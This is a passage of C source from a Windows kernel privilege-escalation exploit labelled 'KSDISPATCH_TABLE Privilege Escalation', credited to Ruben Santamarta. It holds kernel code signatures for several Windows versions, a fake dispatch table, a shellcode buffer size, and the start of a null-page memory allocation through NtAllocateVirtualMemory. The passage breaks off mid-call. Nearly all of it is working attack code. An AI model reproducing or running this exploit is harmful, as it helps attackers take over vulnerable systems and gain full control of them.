printf(" KSDISPATCH_TABLE Privilege Escalation \n");
printf("================================================= \n");
printf(" Ruben Santamarta (reversemode.com)\n");
printf("+ References:\n");
printf(" www.reversemode.com\n\n");
return 1;
}
int Callback_Direct( char *lpInitStr )
{
KARTO_DIRS kDirs;
WCHAR **lpDevices = NULL;
LPVOID pKern=NULL, addr = (LPVOID)3;
HANDLE hKdevice;
HMODULE hNTdll;
char szKdriver[MAX_PATH];
BYTE lpWrite[0x30]={0};
DWORD dwNum = 0,i = 0, b=0,
dwStatus,osVersion=1,dwShellSize=0x1000;
DWORD signature_size,sig_offset,junk,lpTmp;
BOOL bVulnerable = FALSE;
DRIVER_OBJECT drvObj;
KSDISPATCH_TABLE stFakeTable = {0};
unsigned char *signature;
int status = 0;
unsigned char
signature_XPSP2_Vista_2K3[]="\x8B\x41\x60\x8B\x40\x18\x8B\x40"
"\x0C\x8B\x00\x8B\x00\x51\xFF\x75"
"\x08\xFF\x50\x08";
unsigned char signature_2K_SP4[]="\x50\x8B\x48\x60\xFF\x74\x24\x08"
"\x8B\x49\x18\x8B\x49\x0C\x8B\x09"
"\x8B\x09\xFF\x51\x08";
Callback_Overview();
///// Dinamyc stuff
hNTdll = GetModuleHandle( "ntdll.dll" );
printf("\t + NtAllocateVirtualMemory");
NtAllocateVirtualMemory = (PNTALLOCATE) GetProcAddress(hNTdll,
"NtAllocateVirtualMemory");
if( !NtAllocateVirtualMemory )
return 0;
printf( "\t\t [ 0x%p ]\n",NtAllocateVirtualMemory );
printf("\n[+] Allocating memory at [ 0x%p ]...",0);
status = NtAllocateVirtualMemory( INVALID_HANDLE_VALUE,
&addr,
0, |
